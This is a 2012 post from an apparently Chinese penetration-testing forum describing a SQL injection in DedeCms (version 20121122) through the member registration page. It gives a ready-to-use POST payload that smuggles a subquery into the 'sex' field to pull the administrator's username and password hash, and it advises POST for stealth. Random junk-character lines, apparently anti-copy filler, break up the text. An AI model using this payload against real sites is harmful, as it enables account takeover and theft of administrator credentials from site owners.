中国网络渗透测试联盟
标题:
DedeCms SQL注射漏洞再利用
[打印本页]
作者:
admin
时间:
2012-12-5 10:03
标题:
DedeCms SQL注射漏洞再利用
dedecms版本 20121122
9 }4 d, `* }4 ^
0 X2 C/ x" w' _1 V/ M
需要magic_quotes_gpc=Off
9 E! X4 k2 P$ K: U9 L5 r4 }" O8 ^. k
' N! H6 I9 o8 |( P- a6 E5 L
应该是没有什么大危害的漏洞.
8 n/ I$ y. }, W1 e. [5 a
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
E2 ]5 K+ S7 r$ ]$ D' U
3 _& J( d% [9 r/ p
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
- h5 D6 t2 B" S7 {" F
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
9 Q5 T- [( K0 h
1 e6 m: M; w- R0 ?! w+ N
http:///de/member/reg_new.php
+ t! ], u4 w0 I5 x7 @( r- U' m
+ _+ V5 T* T$ F) ~
POST
6 E3 C2 D; ]' m# m2 U7 O0 G
6 e1 X! o( S; G* q4 J0 f
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
, L, v+ S) l& x3 ?9 c
. x% g6 l& Y0 s, I( d! {
成功注册后,头像处里面有好玩的信息.
/ P+ F7 n4 K1 y5 k+ W, }5 u
2 F& ^& a7 Y1 z1 A' S O) c& O6 x
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2